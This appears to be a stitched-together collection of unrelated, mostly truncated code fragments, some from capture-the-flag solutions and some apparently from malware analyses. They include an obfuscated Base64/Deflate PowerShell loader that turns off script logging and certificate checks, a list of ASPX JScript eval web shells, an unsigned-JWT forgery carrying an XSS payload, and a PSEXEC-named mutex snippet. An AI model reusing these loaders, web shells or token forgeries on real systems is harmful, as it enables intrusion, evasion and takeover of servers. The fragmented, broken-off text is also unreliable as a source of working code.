if ([IntPtr]::Size -eq 4) {
    $b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'
}else{
    $b='powershell.exe'
};

#!/usr/bin/env python
import re
h = open('secret.c')
lines = [ x[:-1] for x in h.readlines() ] # remove newline char
h.close()
flag = []
for line in lines:
    num =''.join(re.findall(r'\s+', line)).replace('\t','1').replace(' ','0')

#!/bin/bash
exiftool -b favicon/00000.png | dd bs=1 skip=156 | head -c -84 2>/dev/null > file
for i in {00001..00109}
do
    exiftool -b favicon/$i.png | dd bs=1 skip=156 | head -c -84 2>/dev/null >> file
done
strings file | grep -i "IceCTF" --color=none | tail -n 1

{
  "Status": 0,
  "TC": false,
  "RD": true,
  "RA": true,
  "AD": false,
  "CD": false,
  "Question": [
    {
      "name": "dmarc.jqueryupdatejs.com.",

#!/usr/bin/env python
first_piece = '{ "typ": "JWT", "alg": "none" }'
our_xss = '<script>alert("xss")</script>'
second_piece = '''
{ "username": "%s",
"flag": "IceCTF{hope you don\'t think this is a real flag}"}''' \
% our_xss.replace('"','\\"')

Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ivte0dbG8+P7vtsim6Wfp1kXe4re7z75MT17/5M+8zst82m5/Oflp+pFuv35brNLddPu8qJs23f2Z9KRaXuZ1+6yuFtsnzWW6/e08m+V1+sXxyc808m6l7+bvVtlyhm/u/MZJW1//4t84+bHfbZktcur248/LapKVv+/L16e/9+nJx/gmf5efl9kFffm70c8mp89e5FcGk9fXTZsvxm/mNfVH+I+/WLf5u3Trd2vrdT5isKPv1fn59w0c6vOXTLN2Ov/Fv+Q3Tn7j5HebtQT587zdfpq1ebr9rKoXWZt+fH39xRezGSHwu62ydk5NPvrd8uXlI+pr9fv+vtPpdFxWFx/9xomlmqLY5k27zW/we3g9rxcF+ki3vvc6n67ror0ev6SXpsUqK8ffLZaz6qqxH3x/Q6OzWb5s6ZvvP3pECJ+s65r+3rpzZ3zWnC1fVWW+qYcn66Jspdn304+OZ4tiWRDyWVvVHxFNfre3+TVGSXP+2UefgAk++egXZpf4PbukX2lym6Ja0t9bINZ3F4VhhROalCalXu7t/f5f0mizlggi03JnrK8RgEnR9l8eeOvL18f1dF601GRd5+kn6Ue/EPTd++wj+l1Ijc9m1SIrlvxhB+4Vw51WixVxQ90o2Kfcnl9dN3kt0DCrX70+ffXi+ItT/urla/1C+OU3TorzLelzO/9F6cfPsrLJP77zi5UNzwiyzHW63V6v8vS8KMGieEmmnpv+mPL5j/1 |
0..4|%{try
{
$LogEngineLifeCycleEvent=$LogEngineHealthEvent=$LogProviderLifecycleEvent=$LogProviderHealthEvent=$False;
$u=[System.Text.Encoding]::UTF8;
sAl er Get-Random;
$l=[System.Net.WebRequest];
sAL no New-Object;
$g=[SysTEm.Net.SeRvICePoIntMAnaGEr];
$g::Expect100ConTINuE=0;
$g::ServerCertificateValidationCallback={1};

# Occurrences, WebShell Source
190, <script language="JScript" runat="server">function Page_Load(){eval(Request["NO9BxmCXw0JE"],"unsafe");}</script>
50, <script language="JScript" runat="server">function Page_Load(){eval(Request["orange"],"unsafe");}</script>
11, <script language="JScript" runat="server">function Page_Load(){eval(Request["bingo"],"unsafe");}</script>
7, <script language="JScript" runat="server">function Page_Load(){eval(Request["error"],"unsafe");}</script>
5, <script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script>
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["7gHQRih3fnam"],"unsafe");}</script>
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["coStWhkzUF7n"],"unsafe");}</script>
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["E9RyGFIM8h3S"],"unsafe");}</script>
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["EiH4yV2

[string]$mac = (getmac /FO CSV|Select-Object -Skip 1 -first 1| ConvertFrom-Csv -Header MAC|select-object -expand MAC)
try{
$name = 'Global\PSEXEC'
$exeflag = $flase
New-Object System.Threading.Mutex ($true,$name,[ref]$exeflag)
}catch{}

$dt = Get-Date -Format 'yyMMdd'
$path = "$env:temp\\ccc.log"
[string]$flag = test-path $path